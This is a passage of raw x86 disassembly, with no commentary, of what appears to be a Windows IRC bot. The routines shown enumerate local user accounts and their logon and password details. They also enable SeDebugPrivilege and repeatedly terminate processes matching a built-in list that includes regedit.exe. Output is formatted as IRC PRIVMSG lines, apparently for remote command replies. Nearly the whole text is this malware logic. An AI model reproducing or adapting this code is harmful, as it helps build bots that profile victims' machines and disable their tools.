push eax ; Dest
call _sprintf
mov esi, [ebp+arg_10]
mov edi, [ebp+Str]
mov ebx, [ebp+arg_8]
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409D34
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+0Ch]
lea eax, [ebp+Dest]
push offset aFullNameS ; "Full Name: %S"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409D34
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+8]
lea eax, [ebp+Dest]
push offset aUserCommentS ; "User Comment: %S"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409D34
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+4]
lea eax, [ebp+Dest]
push offset aCommentS ; "Comment: %S"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409D34
mov eax, [ebp+var_4]
add esp, 20h
mov eax, [eax+10h]
sub eax, 0
jz short loc_419EE2
dec eax
jz short loc_419EDB
dec eax
jz short loc_419ED4
mov eax, offset aUnknown_1 ; "Unknown"
jmp short loc_419EE7
; ---------------------------------------------------------------------------
loc_419ED4: ; CODE XREF: sub_419DC3+108�j
mov eax, offset aAdministrator ; "Administrator"
jmp short loc_419EE7
; ---------------------------------------------------------------------------
loc_419EDB: ; CODE XREF: sub_419DC3+105�j
mov eax, offset aUser_3 ; "User"
jmp short loc_419EE7
; ---------------------------------------------------------------------------
loc_419EE2: ; CODE XREF: sub_419DC3+102�j
mov eax, offset aGuest ; "Guest"
loc_419EE7: ; CODE XREF: sub_419DC3+10F�j
; sub_419DC3+116�j ...
push eax
lea eax, [ebp+Dest]
push offset aPrivilegeLevel ; "Privilege Level: %s"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409D34
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+14h]
lea eax, [ebp+Dest]
push offset aAuthFlagsD ; "Auth Flags: %d"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409D34
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+1Ch]
lea eax, [ebp+Dest]
push offset aHomeDirectoryS ; "Home Directory: %S"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409D34
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+20h]
lea eax, [ebp+Dest]
push offset aParametersS ; "Parameters: %S"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409D34
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+18h]
lea eax, [ebp+Dest]
push offset aPasswordAgeD ; "Password Age: %d"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409D34
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+2Ch]
lea eax, [ebp+Dest]
push offset aBadPasswordCou ; "Bad Password Count: %d"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409D34
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+30h]
lea eax, [ebp+Dest]
push offset aNumberOfLogins ; "Number of Logins: %d"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409D34
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+24h]
lea eax, [ebp+Dest]
push offset aLastLogonD ; "Last Logon: %d"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409D34
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+28h]
lea eax, [ebp+Dest]
push offset aLastLogoffD ; "Last Logoff: %d"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409D34
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+34h]
lea eax, [ebp+Dest]
push offset aLogonServerS ; "Logon Server: %S"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409D34
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+3Ch]
lea eax, [ebp+Dest]
push offset aWorkstationsS ; "Workstations: %S"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409D34
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+38h]
lea eax, [ebp+Dest]
push offset aCountryCodeD ; "Country Code: %d"
push eax ; Dest
call _sprintf
push 1 ; int
push esi ; int
lea eax, [ebp+Dest]
push eax ; int
push edi ; Str
push ebx ; int
call sub_409D34
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+4Ch]
lea eax, [ebp+Dest]
push offset aUserSLanguageD ; "User's Language: %d"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409D34
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+40h]
lea eax, [ebp+Dest]
push offset aMax_StorageD ; "Max. Storage: %d"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409D34
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+44h]
lea eax, [ebp+Dest]
push offset aUnitsPerWeekD ; "Units Per Week: %d"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409D34
add esp, 20h
pop edi
pop ebx
jmp short loc_41A197
; ---------------------------------------------------------------------------
loc_41A16B: ; CODE XREF: sub_419DC3+35�j
push eax
lea eax, [ebp+Dest]
push offset asc_4507E0 ; "-"
push eax ; Dest
call _sprintf
push 0 ; int
lea eax, [ebp+Dest]
push [ebp+arg_10] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_8] ; int
call sub_409D34
add esp, 20h
loc_41A197: ; CODE XREF: sub_419DC3+3A6�j
cmp [ebp+var_4], 0
jz short loc_41A1A6
push [ebp+var_4]
call dword_4E3188
loc_41A1A6: ; CODE XREF: sub_419DC3+40�j
; sub_419DC3+3D8�j
mov eax, [ebp+arg_0]
pop esi
leave
retn
sub_419DC3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41A1AC(int,char *Str,int,int)
sub_41A1AC proc near ; CODE XREF: sub_401CC7+47B6�p
Dest = byte ptr -218h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 218h
push ebx
push esi
push edi
xor esi, esi
push [ebp+arg_C]
mov [ebp+var_4], esi
call sub_419AF7
push esi ; int
mov [ebp+var_14], eax
push [ebp+arg_8] ; int
mov [ebp+arg_C], esi
mov [ebp+var_18], esi
mov [ebp+var_10], esi
push offset aUsernameAccoun ; "Username accounts for local system:"
mov [ebp+var_8], esi
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409D34
add esp, 18h
loc_41A1EB: ; CODE XREF: sub_41A1AC+135�j
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_4]
push 0FFFFFFFFh
push eax
push 2
push esi
push [ebp+var_14]
call dword_4E3058
cmp eax, esi
mov [ebp+var_C], eax
jz short loc_41A24C
cmp eax, 0EAh
jz short loc_41A24C
push eax
push eax
call sub_41A32C
pop ecx
push eax
lea eax, [ebp+Dest]
push offset asc_45085C ; "-"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409D34
add esp, 24h
jmp short loc_41A2C7
; ---------------------------------------------------------------------------
loc_41A24C: ; CODE XREF: sub_41A1AC+62�j
; sub_41A1AC+69�j
mov edi, [ebp+var_4]
cmp edi, esi
jz loc_41A2DA
xor ebx, ebx
cmp [ebp+arg_C], esi
jbe short loc_41A2C7
loc_41A25E: ; CODE XREF: sub_41A1AC+ED�j
cmp edi, esi
jz short loc_41A29D
push dword ptr [edi]
lea eax, [ebp+Dest]
push offset aS_30 ; " %S"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409D34
add esp, 20h
add edi, 4
inc [ebp+var_8]
inc ebx
cmp ebx, [ebp+arg_C]
jb short loc_41A25E
jmp short loc_41A2C7
; ---------------------------------------------------------------------------
loc_41A29D: ; CODE XREF: sub_41A1AC+B4�j
lea eax, [ebp+Dest]
push offset asc_450828 ; "-"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409D34
add esp, 1Ch
loc_41A2C7: ; CODE XREF: sub_41A1AC+9E�j
; sub_41A1AC+B0�j ...
mov edi, [ebp+var_4]
cmp edi, esi
jz short loc_41A2DA
push edi
call dword_4E3188
xor edi, edi
mov [ebp+var_4], edi
loc_41A2DA: ; CODE XREF: sub_41A1AC+A5�j
; sub_41A1AC+120�j
cmp [ebp+var_C], 0EAh
jz loc_41A1EB
cmp edi, esi
jz short loc_41A2F2
push edi
call dword_4E3188
loc_41A2F2: ; CODE XREF: sub_41A1AC+13D�j
push [ebp+var_8]
lea eax, [ebp+Dest]
push offset aTotalUsersFoun ; "Total users found: %d."
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409D34
add esp, 20h
xor eax, eax
cmp [ebp+var_C], esi
pop edi
pop esi
setz al
pop ebx
leave
retn
sub_41A1AC endp
; =============== S U B R O U T I N E =======================================
sub_41A32C proc near ; CODE XREF: sub_419965+41�p
; sub_419B5B+69�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, 858h
cmp eax, ecx
ja loc_41A3DE
jz loc_41A3D7
cmp eax, 7Bh
ja short loc_41A3A3
jz short loc_41A399
cmp eax, 5
jz short loc_41A38F
cmp eax, 8
jz short loc_41A385
cmp eax, 32h
jz short loc_41A37B
cmp eax, 35h
jz short loc_41A371
cmp eax, 57h
jnz loc_41A42D
push offset aInvalidParamet ; "Invalid parameter."
jmp loc_41A44E
; ---------------------------------------------------------------------------
loc_41A371: ; CODE XREF: sub_41A32C+30�j
push offset aServerNameNotF ; "Server name not found."
jmp loc_41A44E
; ---------------------------------------------------------------------------
loc_41A37B: ; CODE XREF: sub_41A32C+2B�j
push offset aThisNetworkReq ; "This network request is not supported."
jmp loc_41A44E
; ---------------------------------------------------------------------------
loc_41A385: ; CODE XREF: sub_41A32C+26�j
push offset aNotEnoughMemor ; "Not enough memory."
jmp loc_41A44E
; ---------------------------------------------------------------------------
loc_41A38F: ; CODE XREF: sub_41A32C+21�j
push offset aAccessDenied_ ; "Access denied."
jmp loc_41A44E
; ---------------------------------------------------------------------------
loc_41A399: ; CODE XREF: sub_41A32C+1C�j
push offset aTheNameIsInval ; "The name is invalid."
jmp loc_41A44E
; ---------------------------------------------------------------------------
loc_41A3A3: ; CODE XREF: sub_41A32C+1A�j
sub eax, 7Ch
jz short loc_41A3D0
sub eax, 7C8h
jz short loc_41A3C9
dec eax
jz short loc_41A3BF
dec eax
jnz short loc_41A42D
push offset aDuplicateShare ; "Duplicate share name."
jmp loc_41A44E
; ---------------------------------------------------------------------------
loc_41A3BF: ; CODE XREF: sub_41A32C+84�j
push offset aInvalidForRedi ; "Invalid for redirected resource."
jmp loc_41A44E
; ---------------------------------------------------------------------------
loc_41A3C9: ; CODE XREF: sub_41A32C+81�j
push offset aDeviceOrDirect ; "Device or directory does not exist."
jmp short loc_41A44E
; ---------------------------------------------------------------------------
loc_41A3D0: ; CODE XREF: sub_41A32C+7A�j
push offset aLevelParameter ; "Level parameter is invalid."
jmp short loc_41A44E
; ---------------------------------------------------------------------------
loc_41A3D7: ; CODE XREF: sub_41A32C+11�j
push offset aAGeneralFailur ; "A general failure occurred in the netwo"...
jmp short loc_41A44E
; ---------------------------------------------------------------------------
loc_41A3DE: ; CODE XREF: sub_41A32C+B�j
mov ecx, 8C5h
cmp eax, ecx
ja short loc_41A417
jz short loc_41A410
sub eax, 8ADh
jz short loc_41A442
dec eax
dec eax
jz short loc_41A409
dec eax
jz short loc_41A402
dec eax
dec eax
jnz short loc_41A42D
push offset aTheOperationIs ; "The operation is allowed only on the pr"...
jmp short loc_41A44E
; ---------------------------------------------------------------------------
loc_41A402: ; CODE XREF: sub_41A32C+C9�j
push offset aTheUserAccount ; "The user account already exists."
jmp short loc_41A44E
; ---------------------------------------------------------------------------
loc_41A409: ; CODE XREF: sub_41A32C+C6�j
push offset aTheGroupAlread ; "The group already exists."
jmp short loc_41A44E
; ---------------------------------------------------------------------------
loc_41A410: ; CODE XREF: sub_41A32C+BB�j
push offset aThePasswordIsS ; "The password is shorter than required ("...
jmp short loc_41A44E
; ---------------------------------------------------------------------------
loc_41A417: ; CODE XREF: sub_41A32C+B9�j
sub eax, 8CAh
jz short loc_41A449
sub eax, 17h
jz short loc_41A442
sub eax, 25h
jz short loc_41A43B
sub eax, 29h
jz short loc_41A434
loc_41A42D: ; CODE XREF: sub_41A32C+35�j
; sub_41A32C+87�j ...
push offset aAnUnknownErr_0 ; "An unknown error occurred."
jmp short loc_41A44E
; ---------------------------------------------------------------------------
loc_41A434: ; CODE XREF: sub_41A32C+FF�j
push offset aTheComputerNam ; "The computer name is invalid."
jmp short loc_41A44E
; ---------------------------------------------------------------------------
loc_41A43B: ; CODE XREF: sub_41A32C+FA�j
push offset aShareNotFound_ ; "Share not found."
jmp short loc_41A44E
; ---------------------------------------------------------------------------
loc_41A442: ; CODE XREF: sub_41A32C+C2�j
; sub_41A32C+F5�j
push offset aTheUserNameCou ; "The user name could not be found."
jmp short loc_41A44E
; ---------------------------------------------------------------------------
loc_41A449: ; CODE XREF: sub_41A32C+F0�j
push offset aNetworkConnect ; "Network connection not found."
loc_41A44E: ; CODE XREF: sub_41A32C+40�j
; sub_41A32C+4A�j ...
push offset byte_4F2DFC ; Dest
call _sprintf
pop ecx
mov eax, offset byte_4F2DFC
pop ecx
retn
sub_41A32C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41A460(char *Source)
sub_41A460 proc near ; CODE XREF: sub_401CC7+47FC�p
Dest = word ptr -718h
var_318 = byte ptr -318h
var_108 = byte ptr -108h
Source = dword ptr 8
push ebp
mov ebp, esp
sub esp, 718h
push esi
push 200h ; MaxCount
push [ebp+Source] ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _mbstowcs
add esp, 0Ch
lea eax, [ebp+Source]
mov esi, 108h
push eax
lea eax, [ebp+var_108]
push eax
mov [ebp+Source], esi
call ds:dword_4F5394 ; GetComputerNameA
lea eax, [ebp+var_108]
push esi ; MaxCount
push eax ; Source
lea eax, [ebp+var_318]
push eax ; Dest
call _mbstowcs
lea eax, [ebp+Dest]
push eax ; Str
call _wcslen
add esp, 10h
shl eax, 1
push eax
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_318]
push 0
push eax
push 0
call dword_4E3108
test eax, eax
jnz short loc_41A4F0
mov esi, offset byte_4F2BF8
push offset asc_450B58 ; "-"
push esi ; Dest
call _sprintf
pop ecx
pop ecx
jmp short loc_41A519
; ---------------------------------------------------------------------------
loc_41A4F0: ; CODE XREF: sub_41A460+7A�j
lea ecx, [ebp+Dest]
push ecx
lea ecx, [ebp+var_318]
push ecx
push eax
call sub_41A32C
pop ecx
mov esi, offset byte_4F2BF8
push eax
push offset asc_450B80 ; "-"
push esi ; Dest
call _sprintf
add esp, 14h
loc_41A519: ; CODE XREF: sub_41A460+8E�j
mov eax, esi
pop esi
leave
retn
sub_41A460 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A51E proc near ; CODE XREF: sub_417A8B+45�p
; sub_417A8B+166�p ...
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
lea eax, [ebp+var_4]
push eax
push 28h
call ds:dword_4F53CC ; GetCurrentProcess
push eax
call dword_4E30DC ; OpenProcessToken
test eax, eax
jnz short loc_41A53D
leave
retn
; ---------------------------------------------------------------------------
loc_41A53D: ; CODE XREF: sub_41A51E+1B�j
lea eax, [ebp+var_10]
push esi
push eax
xor esi, esi
push [ebp+arg_0]
push esi
call dword_4E30B4 ; LookupPrivilegeValueA
test eax, eax
jz short loc_41A57B
cmp [ebp+arg_4], esi
mov [ebp+var_14], 1
jz short loc_41A564
or [ebp+var_8], 2
jmp short loc_41A568
; ---------------------------------------------------------------------------
loc_41A564: ; CODE XREF: sub_41A51E+3E�j
and [ebp+var_8], 0FFFFFFFDh
loc_41A568: ; CODE XREF: sub_41A51E+44�j
push esi
push esi
lea eax, [ebp+var_14]
push esi
push eax
push esi
push [ebp+var_4]
call dword_4E3164 ; AdjustTokenPrivileges
mov esi, eax
loc_41A57B: ; CODE XREF: sub_41A51E+32�j
push [ebp+var_4]
call ds:dword_4F533C ; CloseHandle
mov eax, esi
pop esi
leave
retn
sub_41A51E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41A589(int,char *Str,int,char *Str2,int,int)
sub_41A589 proc near ; CODE XREF: sub_401CC7+79CB�p
; sub_41A7CC+74�p ...
Dest = byte ptr -554h
var_354 = dword ptr -354h
var_350 = byte ptr -350h
var_234 = byte ptr -234h
var_130 = dword ptr -130h
var_12C = byte ptr -12Ch
var_128 = dword ptr -128h
Str1 = byte ptr -10Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
Str2 = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 554h
push ebx
push esi
push edi
push 49h
xor ebx, ebx
pop ecx
xor eax, eax
cmp dword_4E3118, ebx
lea edi, [ebp+var_12C]
mov [ebp+var_130], ebx
rep stosd
mov ecx, 88h
lea edi, [ebp+var_350]
mov [ebp+var_354], ebx
rep stosd
jz loc_41A79C
cmp dword_4E30FC, ebx
jz loc_41A79C
cmp dword_4E300C, ebx
jz loc_41A79C
push 1
push offset aSedebugprivi_1 ; "SeDebugPrivilege"
call sub_41A51E
pop ecx
pop ecx
push ebx
push 0Fh
call dword_4E3118 ; CreateToolhelp32Snapshot
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_8], edi
jz loc_41A78F
lea eax, [ebp+var_130]
mov [ebp+var_130], 128h
push eax
push edi
call dword_4E30FC ; Process32First
mov esi, ds:dword_4F533C
test eax, eax
jz loc_41A78A
lea eax, [ebp+var_130]
push eax
push edi
call dword_4E300C ; Process32Next
test eax, eax
jz loc_41A78A
mov edi, ds:dword_4F5358
mov ebx, 1F0FFFh
loc_41A64D: ; CODE XREF: sub_41A589+1F9�j
xor eax, eax
cmp [ebp+arg_10], eax
jz short loc_41A6B4
mov [ebp+var_4], offset off_450BB0
loc_41A65B: ; CODE XREF: sub_41A589+F3�j
mov eax, [ebp+var_4]
push dword ptr [eax]
lea eax, [ebp+Str1]
push eax
call ds:dword_4F5458 ; lstrcmpi
test eax, eax
jz short loc_41A683
add [ebp+var_4], 4
cmp [ebp+var_4], offset aRegedit_exe ; "regedit.exe"
jb short loc_41A65B
jmp loc_41A770
; ---------------------------------------------------------------------------
loc_41A683: ; CODE XREF: sub_41A589+E6�j
push [ebp+var_128]
push 0
push ebx
call edi ; OpenProcess
test eax, eax
mov [ebp+var_4], eax
jz loc_41A770
push 0
push eax
call ds:dword_4F53C4 ; TerminateProcess
test eax, eax
jnz loc_41A770
loc_41A6AA: ; CODE XREF: sub_41A589+1CD�j
push [ebp+var_4]
call esi ; CloseHandle
jmp loc_41A770
; ---------------------------------------------------------------------------
loc_41A6B4: ; CODE XREF: sub_41A589+C9�j
cmp [ebp+Str2], eax
jnz loc_41A75B
cmp [ebp+Str], eax
jz loc_41A770
push [ebp+var_128]
push 8
call dword_4E3118 ; CreateToolhelp32Snapshot
cmp [ebp+arg_14], 0
mov [ebp+var_4], eax
mov [ebp+var_354], 224h
jz short loc_41A71B
lea ecx, [ebp+var_354]
push ecx
push eax
call dword_4E2FB8 ; Module32First
push [ebp+var_128]
test eax, eax
jz short loc_41A70D
lea eax, [ebp+var_234]
push eax
push offset aSD_0 ; " %s (%d)"
jmp short loc_41A72D
; ---------------------------------------------------------------------------
loc_41A70D: ; CODE XREF: sub_41A589+174�j
lea eax, [ebp+Str1]
push eax
push offset aSD_1 ; " %s (%d)"
jmp short loc_41A72D
; ---------------------------------------------------------------------------
loc_41A71B: ; CODE XREF: sub_41A589+15C�j
push [ebp+var_128]
lea eax, [ebp+Str1]
push eax
push offset aSD_2 ; " %s (%d)"
loc_41A72D: ; CODE XREF: sub_41A589+182�j
; sub_41A589+190�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 10h
lea eax, [ebp+Dest]
push 1 ; int
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409D34
add esp, 14h
jmp loc_41A6AA
; ---------------------------------------------------------------------------
loc_41A75B: ; CODE XREF: sub_41A589+12E�j
push [ebp+Str2] ; Str2
lea eax, [ebp+Str1]
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_41A7A3
loc_41A770: ; CODE XREF: sub_41A589+F5�j
; sub_41A589+10A�j ...
lea eax, [ebp+var_130]
push eax
push [ebp+var_8]
call dword_4E300C ; Process32Next
test eax, eax
jnz loc_41A64D
xor ebx, ebx
loc_41A78A: ; CODE XREF: sub_41A589+9D�j
; sub_41A589+B3�j
push [ebp+var_8]
call esi ; CloseHandle
loc_41A78F: ; CODE XREF: sub_41A589+77�j
push ebx
push offset aSedebugprivi_2 ; "SeDebugPrivilege"
call sub_41A51E
pop ecx
pop ecx
loc_41A79C: ; CODE XREF: sub_41A589+3A�j
; sub_41A589+46�j ...
xor eax, eax
loc_41A79E: ; CODE XREF: sub_41A589+241�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41A7A3: ; CODE XREF: sub_41A589+1E5�j
push [ebp+var_128]
push 0
push ebx
call edi ; OpenProcess
push [ebp+var_8]
mov edi, eax
call esi ; CloseHandle
push 0
push edi
call ds:dword_4F53C4 ; TerminateProcess
test eax, eax
jnz short loc_41A7C7
push edi
call esi ; CloseHandle
jmp short loc_41A79C
; ---------------------------------------------------------------------------
loc_41A7C7: ; CODE XREF: sub_41A589+237�j
push 1
pop eax
jmp short loc_41A79E
sub_41A589 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A7CC proc near ; DATA XREF: sub_401CC7+26BE�o
Dest = byte ptr -298h
var_98 = dword ptr -98h
Str = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 298h
mov eax, [ebp+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+var_98]
push offset asc_450DA8 ; "-"
rep movsd
mov dword ptr [eax+94h], 1
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
xor esi, esi
pop ecx
cmp [ebp+var_8], esi
pop ecx
jnz short loc_41A82B
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_98] ; int
call sub_409D34
add esp, 14h
loc_41A82B: ; CODE XREF: sub_41A7CC+3D�j
push [ebp+var_10] ; int
lea eax, [ebp+Str]
push esi ; int
push esi ; Str2
push [ebp+var_C] ; int
push eax ; Str
push [ebp+var_98] ; int
call sub_41A589
add esp, 18h
test eax, eax
jnz short loc_41A853
push offset unk_450DC8
jmp short loc_41A858
; ---------------------------------------------------------------------------
loc_41A853: ; CODE XREF: sub_41A7CC+7E�j
push offset asc_450DEC ; "-"
loc_41A858: ; CODE XREF: sub_41A7CC+85�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
cmp [ebp+var_8], esi
pop ecx
pop ecx
jnz short loc_41A88B
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_98] ; int
call sub_409D34
add esp, 14h
loc_41A88B: ; CODE XREF: sub_41A7CC+9D�j
lea eax, [ebp+Dest]
push eax
call sub_415C3F
push [ebp+var_14]
call sub_40BA72
pop ecx
pop ecx
push esi
call ds:dword_4F53A0 ; ExitThread
pop edi
pop esi
sub_41A7CC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41A8AA proc near ; CODE XREF: sub_401CC7+7969�p
; sub_40B891+53�p
arg_0 = dword ptr 4
push esi
push edi
push 1
pop edi
push [esp+8+arg_0]
push 0
push 1F0FFFh
call ds:dword_4F5358 ; OpenProcess
mov esi, eax
test esi, esi
jz short loc_41A8DC
push 0
push esi
call ds:dword_4F53C4 ; TerminateProcess
test eax, eax
jnz short loc_41A8DC
push esi
xor edi, edi
call ds:dword_4F533C ; CloseHandle
loc_41A8DC: ; CODE XREF: sub_41A8AA+1A�j
; sub_41A8AA+27�j
mov eax, edi
pop edi
pop esi
retn
sub_41A8AA endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_41A8E1 proc near ; DATA XREF: WinMain(x,x,x,x)+3CD�o
push esi
xor esi, esi
loc_41A8E4: ; CODE XREF: sub_41A8E1+1E�j
push 1 ; int
push esi ; int
push esi ; Str2
push esi ; int
push esi ; Str
push esi ; int
call sub_41A589
add esp, 18h
push dword_450BAC
call ds:dword_4F534C ; Sleep
jmp short loc_41A8E4
sub_41A8E1 endp
; =============== S U B R O U T I N E =======================================
sub_41A901 proc near ; CODE XREF: sub_41A931+2A�p
; sub_41A969+7E�p ...
mov eax, dword_4F3464
push esi
mov esi, ds:dword_4F533C
cmp eax, 0FFFFFFFFh
jz short loc_41A915
push eax
call esi ; CloseHandle
loc_41A915: ; CODE XREF: sub_41A901+F�j
mov eax, dword_4F346C
cmp eax, 0FFFFFFFFh
jz short loc_41A922
push eax
call esi ; CloseHandle
loc_41A922: ; CODE XREF: sub_41A901+1C�j
mov eax, dword_4F3460
cmp eax, 0FFFFFFFFh
jz short loc_41A92F
push eax
call esi ; CloseHandle
loc_41A92F: ; CODE XREF: sub_41A901+29�j
pop esi
retn
sub_41A901 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41A931(char *Str)
sub_41A931 proc near ; CODE XREF: sub_401CC7+76AD�p
; sub_4167BF+14A�p
var_4 = dword ptr -4
Str = dword ptr 8
push ebp
mov ebp, esp
push ecx
push [ebp+Str] ; Str
call _strlen
pop ecx
mov [ebp+var_4], eax
lea ecx, [ebp+var_4]
push 0
push ecx
push eax
push [ebp+Str]
push dword_4F3468
call ds:dword_4F53B4 ; WriteFile
test eax, eax
jnz short loc_41A964
call sub_41A901
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_41A964: ; CODE XREF: sub_41A931+28�j
push 1
pop eax
leave
retn
sub_41A931 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41A969(int,char *Str1,int)
sub_41A969 proc near ; CODE XREF: sub_41A9F0+D3�p
; sub_41A9F0+F2�p ...
Dest = byte ptr -200h
arg_0 = dword ptr 8
Str1 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push offset byte_4F34AC ; Str2
push [ebp+Str1] ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_41A9AC
push 7D0h
call ds:dword_4F534C ; Sleep
push [ebp+arg_8]
lea eax, [ebp+Dest]
push [ebp+Str1]
push offset aPrivmsgSS_4 ; "PRIVMSG %s :%s\r"
push eax ; Dest
call _sprintf
add esp, 10h
jmp short loc_41A9C3
; ---------------------------------------------------------------------------
loc_41A9AC: ; CODE XREF: sub_41A969+1A�j
push [ebp+arg_8]
lea eax, [ebp+Dest]
push offset aS_31 ; "%s"
push eax ; Dest
